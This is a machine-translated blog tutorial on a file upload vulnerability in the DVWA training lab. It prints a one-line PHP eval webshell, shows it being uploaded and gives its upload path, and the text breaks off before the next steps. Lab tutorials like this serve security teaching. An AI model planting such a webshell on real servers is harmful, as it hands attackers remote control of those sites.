当前位置:网站首页>Obtain website shell permission based on file upload vulnerability
Obtain website shell permission based on file upload vulnerability
2022-07-27 21:05:00 【Cwillchris】
One 、 actual combat - be based on DVWA Of low Level demo file upload vulnerability
1、 File upload vulnerability profile
File Upload, File upload vulnerability , Usually due to the type of upload file 、 The content is not strictly filtered 、 Check , So that the attacker can get the server's webshell jurisdiction , Therefore, the harm caused by file upload vulnerability is often devastating ,Apache、Tomcat、Nginx And others have exposed file upload vulnerabilities .
Experimental environment : The experimental environment in this section is :Win7 Under the chrome The browser and burp suite Mainly .
2、 Upload Trojan files
newly build webshell.php, Write a word Trojan :
<?php @eval($_POST[cwillchris]);?>
open DVWA, Choose a low security level , And then choose File Upload, Upload webshell.php

Web Check the location of file upload on the site , According to the prompt, in ../../hackable/uploads/webshell.php
open
边栏推荐
- [dart] a programming language for cross end development
- redis cook book.notes.
- How to translate the address in the program?
- R语言使用epiDisplay包的lroc函数可视化logistic回归模型的ROC曲线并输出诊断表(diagnostic table)、可视化多条ROC曲线、使用legend函数为可视化图像添加图例
- 自定义学习率
- [numpy] broadcast mechanism
- Know the transmission medium, the medium of network communication
- How to realize document collaboration?
- Qt 链接MSSQL
- R语言使用dplyr包进行数据聚合统计计算滑动窗口统计值(Window Statistics)、计算滑动分组均值(mean)并合并生成的统计数据到原数据集中
猜你喜欢

一文读懂Plato&nbsp;Farm的ePLATO,以及其高溢价缘由

Hcip day 5

NATAPP内网穿透工具外网访问个人项目

NPDP | what kind of product manager can be called excellent?
![[numpy] array index and slice](/img/ce/34db7aef3fefe8a03e638d0838492f.png)
[numpy] array index and slice

Source Insight 4.0使用介绍

Beijing / Shanghai / Guangzhou / Shenzhen dama-cdga/cdgp data governance certification registration conditions

82. (cesium article) cesium points move on 3D models

如何让个性化推荐即刻触达?云原生数据库GaussDB(for Redis)来助力

基于文件上传漏洞获得网站 shell 权限
随机推荐
A lock faster than read-write lock. Don't get to know it quickly
UE5使用DLSS(超级采样)提升场景的 FPS 远离卡顿的优化方案
Go --- automatic recompilation of air
一文读懂Plato&nbsp;Farm的ePLATO,以及其高溢价缘由
坚持做一件事情
How to realize document collaboration?
NATAPP内网穿透工具外网访问个人项目
Beijing / Shanghai / Guangzhou / Shenzhen dama-cdga/cdgp data governance certification registration conditions
R语言使用lm函数构建多元回归模型(Multiple Linear Regression)、并根据模型系数写出回归方程、使用deviance函数计算出模型的残差平方和
opencv实现图片裁剪和缩放
82. (cesium article) cesium points move on 3D models
如何查看蓝牙耳机的蓝牙版本
认识传输介质物理层概述
vant组件库
ELK太重?试试KFC日志采集
A method of MCU log output
LeetCode每日一练 —— 876. 链表的中间结点
API Gateway介绍
Ue5 uses DLSS (super sampling) to improve the FPS of the scene away from the optimization scheme of Caton
用户登录切换案例